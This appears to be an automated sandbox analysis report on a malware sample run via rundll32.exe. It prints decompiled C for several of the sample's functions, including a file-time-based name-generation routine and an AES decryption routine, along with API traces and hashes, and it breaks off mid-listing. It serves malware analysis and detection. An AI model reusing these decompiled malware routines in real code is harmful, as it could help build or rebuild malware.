Uniqueness

Uniqueness Score: -1.00%

Function 005031C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 005031DA

Part of subcall function 00507471: SysFreeString.OLEAUT32(?), ref: 00507550

SysFreeString.OLEAUT32(00000000), ref: 0050321A

Strings

-tP, xrefs: 005031CB

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID: -tP
API String ID: 986138563-4025278887
Opcode ID: fb6ff40e7f75228aff7b23653384d8fe2255e9584882dd657a43a269057d4493
Instruction ID: 1854bae0d240257b013bb9b3f298a10bc260f573d85ea9c79446e4dd0e4d4381
Opcode Fuzzy Hash: fb6ff40e7f75228aff7b23653384d8fe2255e9584882dd657a43a269057d4493
Instruction Fuzzy Hash: 7101A23650010EBBDB109F69DC488EF7BB8FF88310B004021F905A6120E3709A19DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0050110A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
registryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0050110A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _t11;
				void* _t15;

				_t11 =  *0x50a0c0(_a4, _a12,  &_a12);
				_t15 = _t11;
				if(_t15 == 0) {
					_t15 =  *0x50a0c8(_a12, _a16, _t11, _a8, _a20, _a24);
					RegCloseKey(_a12);
				}
				return _t15;
			}

0x00501118
0x0050111e
0x00501122
0x0050113d
0x0050113f
0x0050113f
0x00501149

APIs

RegCloseKey.ADVAPI32(005020DE,?,00505C49,80000002,00000003,005020DE,?,?,?,?,?,00504BED,00000000,00000000,80000002,00000000), ref: 0050113F

Strings

-tP, xrefs: 0050110D
"{P, xrefs: 00501134

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Close
String ID: "{P$-tP
API String ID: 3535843008-2739258846
Opcode ID: 37f7acc683dd27f423a7e77a8070a414e0ae4ed6f20c87727c402a892ab4a824
Instruction ID: f414fb5cfd5932ae389d697e34e8e3830c78a148c485d72a28ccedec4a433ae9
Opcode Fuzzy Hash: 37f7acc683dd27f423a7e77a8070a414e0ae4ed6f20c87727c402a892ab4a824
Instruction Fuzzy Hash: 04E0527650025EAFDF125F94EC188EE3FAAFB18791B044421FE1592260D732C934EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C5404E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507

Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19

Strings

string too long, xrefs: 6C5405B4, 6C54079A
invalid string position, xrefs: 6C540790

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
String ID: invalid string position$string too long
API String ID: 657562460-4289949731
Opcode ID: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
Instruction ID: 7db93f48d6cf20c6cfe000af4f046df2468a94e9eacf95f9d4b19c1418d6e885
Opcode Fuzzy Hash: b4c67513bb4f64c3f1371a02bfb47edf8ad6f364b48eb7a164900fac0ccf0e54
Instruction Fuzzy Hash: 6FD09B75701145866B1C45B44C159AF5194CBA031DF3489399627CAE91D725E8544157

Uniqueness

Uniqueness Score: -1.00%

Function 00502956, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
timeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00502956(void* __ecx) {
				struct _FILETIME _v12;
				void* _t6;

				GetSystemTimeAsFileTime( &_v12);
				_t3 =  &(_v12.dwHighDateTime); // 0x5061ef
				_push(0);
				_t6 = _v12.dwLowDateTime + 0x2ac18000;
				_push(0x989680);
				asm("adc ecx, 0xfe624e21");
				_push( *_t3);
				_push(_t6);
				L00507F50();
				return _t6;
			}

0x0050295f
0x00502968
0x0050296b
0x0050296d
0x00502972
0x00502977
0x0050297d
0x0050297e
0x0050297f
0x00502985

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,00000000,005061EF), ref: 0050295F
_aulldiv.NTDLL(-2AC18000,aP,00989680,00000000), ref: 0050297F

Strings

aP, xrefs: 00502968, 0050297D

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileSystem_aulldiv
String ID: aP
API String ID: 2806457037-4089225102
Opcode ID: d5a578bffeae6ae84ae30bbb0d61ef6e96e334874d6cbb1a040f451e140d3a28
Instruction ID: d93e753b777cbbbcc810c50d1fd73ec2dac0c637cf380a0ec5a36f490a2832f2
Opcode Fuzzy Hash: d5a578bffeae6ae84ae30bbb0d61ef6e96e334874d6cbb1a040f451e140d3a28
Instruction Fuzzy Hash: 79D09BB5D1430D77DB04D7D0DC9EF9EB76CE748649F040554B501A2641E574F5049720

Uniqueness

Uniqueness Score: -1.00%

Function 6C54218A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6C54219D

Part of subcall function 6C544920: std::exception::_Copy_str.LIBCMT ref: 6C544939

__CxxThrowException@8.LIBCMT ref: 6C5421B2

Part of subcall function 6C544A87: RaiseException.KERNEL32(?,00000000,?,?,00000000), ref: 6C544ADC

Strings

|'Ql, xrefs: 6C5421A7, 6C542193

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: |'Ql
API String ID: 757275642-3658207547
Opcode ID: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
Instruction ID: 0606890895c61653aa72ed7b41f8e311aa37effed93cf402e43c53eb2694b090
Opcode Fuzzy Hash: 0e9698cb43c8bea3b7929c31728d69c63b2cba2942c98ba2a553994ec8247d58
Instruction Fuzzy Hash: 69D06775C0020DBB8B04EFA5DC899CEBBBCEA48244F40C466A914A7A01E734A6488F94

Uniqueness

Uniqueness Score: -1.00%

Function 00507B36, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00507B36() {

				E00507C36(0x509324, 0x50a0d0);
				goto __eax;
			}

0x00507b0f
0x00507b16

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00507B0F

Part of subcall function 00507C36: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00507CAF

Strings

6{P, xrefs: 00507B36
"{P, xrefs: 00507B09

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: "{P$6{P
API String ID: 123106877-883856768
Opcode ID: f69bd5d6cdf1f519823749d97203f667182ea7db46ff6c84e11ab75ddc4374aa
Instruction ID: 89814c76bf03bd702fd3e2b67303b70a90cb3fb9e26367c40ab99547f124d756
Opcode Fuzzy Hash: f69bd5d6cdf1f519823749d97203f667182ea7db46ff6c84e11ab75ddc4374aa
Instruction Fuzzy Hash: 86B012D6A5C60EBCF2245208AD0ED3F4E8CF3C8B10730481AF005C41C1E8803C001172

Uniqueness

Uniqueness Score: -1.00%

Function 00502FFC, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00502FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00505C4E(_t2);
				if(_t34 != 0) {
					_t30 = E00505C4E(_t28);
					if(_t30 == 0) {
						E00502A03(_t34);
					} else {
						_t39 = _a4;
						_t22 = E005079AC(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E005079AC(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00502ffc
0x00503006
0x00503008
0x0050300e
0x0050300e
0x00503017
0x0050301b
0x00503027
0x0050302b
0x0050309f
0x0050302d
0x0050302d
0x00503031
0x00503038
0x0050303b
0x00503055
0x00503044
0x00503044
0x00503048
0x0050304b
0x00503050
0x00503050
0x0050305a
0x00503082
0x00503088
0x0050308b
0x0050305c
0x0050305e
0x00503066
0x00503071
0x00503076
0x00503076
0x00503092
0x00503099
0x0050309a
0x0050309a
0x0050302b
0x005030aa

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,005056E5,00000000,00000000,00000000,02FE9698,?,?,00503B82,?,02FE9698), ref: 00503008

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

Part of subcall function 005079AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00503036,00000000,00000001,00000001,?,?,005056E5,00000000,00000000,00000000,02FE9698), ref: 005079BA
Part of subcall function 005079AC: StrChrA.SHLWAPI(?,0000003F,?,?,005056E5,00000000,00000000,00000000,02FE9698,?,?,00503B82,?,02FE9698,0000EA60,?), ref: 005079C4

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,005056E5,00000000,00000000,00000000,02FE9698,?,?,00503B82), ref: 00503066
lstrcpy.KERNEL32(00000000,00000000), ref: 00503076
lstrcpy.KERNEL32(00000000,00000000), ref: 00503082

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 15f36b60076e25c883607b5bc3b5cca5ac5a9451088dc0dfff7bf726435acaa3
Instruction ID: cd62731183470e673d872ce26cb90f2e402b7fce6069a2fdde27a3fd79ceec71
Opcode Fuzzy Hash: 15f36b60076e25c883607b5bc3b5cca5ac5a9451088dc0dfff7bf726435acaa3
Instruction Fuzzy Hash: D721C07250125AAFCB129F65CC5CAAF7FACBF56380B054054F8049B292D771CA0097A1

Uniqueness

Uniqueness Score: -1.00%

Function 00504DC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00504DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00505C4E(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00504ddd
0x00504de1
0x00504deb
0x00504df2
0x00504df5
0x00504df7
0x00504dff
0x00504e04
0x00504e12
0x00504e17
0x00504e21

APIs

lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,02FE932C,?,00504ABB,004F0053,02FE932C,?,?,?,?,?,?,00501BD5), ref: 00504DD8
lstrlenW.KERNEL32(00504ABB,?,00504ABB,004F0053,02FE932C,?,?,?,?,?,?,00501BD5), ref: 00504DDF

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00504ABB,004F0053,02FE932C,?,?,?,?,?,?,00501BD5), ref: 00504DFF
memcpy.NTDLL(73B769A0,00504ABB,00000002,00000000,004F0053,73B769A0,?,?,00504ABB,004F0053,02FE932C), ref: 00504E12

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: b2f2b4a292aeb49eb1163be718b7042bb66d5dea556af9221795d4f63c609b19
Instruction ID: 3d00f74e7d84344a5192a1ec8639cb8a8a893864229ae8c3f13c41596332e9ee
Opcode Fuzzy Hash: b2f2b4a292aeb49eb1163be718b7042bb66d5dea556af9221795d4f63c609b19
Instruction Fuzzy Hash: 05F0EC76900119BBCB11DFA9CC49C9E7BACFF49394B154062BD04D7112E771EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00502829, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02FE887A,00000000,00000000,00000000,00506328,00000000), ref: 00502839
lstrlen.KERNEL32(?), ref: 00502841

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

lstrcpy.KERNEL32(00000000,02FE887A), ref: 00502855
lstrcat.KERNEL32(00000000,?), ref: 00502860

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: a78ea30d9b44cb557a3d7519215b643af7c7168c40178944453171a5a04d74e3
Instruction ID: afe58560d183cdd080e4d08e4aba2e70881cef5cb97f5d6d25db4020092ad7a3
Opcode Fuzzy Hash: a78ea30d9b44cb557a3d7519215b643af7c7168c40178944453171a5a04d74e3
Instruction Fuzzy Hash: 13E0927390166167C7115BA59C4CC9FBBACFFE96517044816FA00D3115C72488099BA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6640 Parent PID: 6612 rundll32.exeCOMMON

Executed Functions

Function 04774E9C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E04774E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x477a2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x477a290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x477a2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x477a290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x477a290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x477a2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x477a2d0; // 0x96d5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x477b825; // 0x73797325
				_t83 = E04771000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x477a290, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x477a2d0; // 0x96d5a8
				_t16 = _t93 + 0x477b846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x04774ea5
0x04774eab
0x04774ead
0x04774ec7
0x04774ecb
0x04774ece
0x04775143
0x0477514a
0x0477514a
0x04774ed4
0x04774ee9
0x04774eeb
0x04774eef
0x04774ef2
0x04775133
0x0477513d
0x00000000
0x0477513d
0x04774ef8
0x04774f03
0x04774f08
0x04774f0d
0x04774f10
0x04774f17
0x04774f1e
0x04774f21
0x04775123
0x0477512d
0x00000000
0x0477512d
0x04774f37
0x04774f3b
0x04774f3e
0x04774f41
0x04774f49
0x04774f4c
0x04774f55
0x04774f5b
0x04774f65
0x04774f6c
0x04774f6c
0x04774f7e
0x04774f89
0x04774f97
0x04774f9c
0x04774fa1
0x04774fa4
0x04774fa9
0x04774fb3
0x04774fb6
0x04774fb9
0x04774fcf
0x04774fd3
0x04774fd6
0x04775121
0x00000000
0x04775121
0x04774fed
0x0477503e
0x04775001
0x04775009
0x0477500e
0x0477501c
0x04775025
0x0477502e
0x0477502e
0x0477503c
0x0477503c
0x04775042
0x04775046
0x04775046
0x0477504c
0x00000000
0x00000000
0x0477504e
0x04775054
0x047750fb
0x047750fe
0x0477510b
0x0477510b
0x0477510f
0x00000000
0x00000000
0x04775104
0x04775108
0x04775108
0x0477510a
0x0477510a
0x04775114
0x0477511b
0x0477511d
0x00000000
0x0477511d
0x0477505a
0x0477505c
0x0477505c
0x0477506f
0x04775075
0x04775080
0x04775082
0x04775086
0x04775088
0x04775088
0x0477508d
0x0477508f
0x0477508f
0x0477508d
0x04775094
0x04775098
0x04775098
0x047750a8
0x047750ad
0x047750b0
0x047750b0
0x047750b3
0x047750bd
0x047750c5
0x047750ca
0x047750d8
0x047750d8
0x047750ec
0x047750f0
0x047750f0

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,0477A380), ref: 04774EC7
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04774EE9
memset.NTDLL ref: 04774F03

Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,04774F1C,73797325), ref: 04771011
Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0477102B

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04774F41
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04774F55
FindCloseChangeNotification.KERNELBASE(?), ref: 04774F6C
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04774F78
lstrcat.KERNEL32(?,642E2A5C), ref: 04774FB9
FindFirstFileA.KERNELBASE(?,?), ref: 04774FCF
CompareFileTime.KERNEL32(?,?), ref: 04774FED
FindNextFileA.KERNELBASE(04773EAC,?), ref: 04775001
FindClose.KERNEL32(04773EAC), ref: 0477500E
FindFirstFileA.KERNEL32(?,?), ref: 0477501A
CompareFileTime.KERNEL32(?,?), ref: 0477503C
StrChrA.SHLWAPI(?,0000002E), ref: 0477506F
memcpy.NTDLL(04772779,?,00000000), ref: 047750A8
FindNextFileA.KERNELBASE(04773EAC,?), ref: 047750BD
FindClose.KERNEL32(04773EAC), ref: 047750CA
FindFirstFileA.KERNEL32(?,?), ref: 047750D6
CompareFileTime.KERNEL32(?,?), ref: 047750E6
FindClose.KERNELBASE(04773EAC), ref: 0477511B
HeapFree.KERNEL32(00000000,04772779,73797325), ref: 0477512D
HeapFree.KERNEL32(00000000,?), ref: 0477513D

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: 323ec4101b3a0a521548fa19d82157e84dde8521bd7c3bdaad39665b381a74a2
Instruction ID: afb0a641749e60fd523fa2ed015194cbe54fba847cae480c28489c20843dea3c
Opcode Fuzzy Hash: 323ec4101b3a0a521548fa19d82157e84dde8521bd7c3bdaad39665b381a74a2
Instruction Fuzzy Hash: 03812CB1A00219AFEF11DFA5DC84EEEBBB9FB44340F504466E605E6250E775AE44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 047735A1, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E047735A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x477a0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x477a0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04775C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x477a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E04772A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x047735aa
0x047735b0
0x047735b3
0x047735b9
0x047735b9
0x047735bb
0x047735bd
0x047735c0
0x047735c6
0x047735c7
0x047735c8
0x047735ce
0x047735d3
0x047735d9
0x047735e1
0x0477373e
0x047735e7
0x047735e9
0x047735f2
0x047735f7
0x04773609
0x0477360c
0x04773610
0x04773617
0x0477361b
0x04773623
0x04773729
0x04773629
0x04773629
0x0477362d
0x0477362e
0x04773630
0x0477363b
0x04773715
0x04773641
0x04773641
0x04773644
0x0477364a
0x04773650
0x04773650
0x04773658
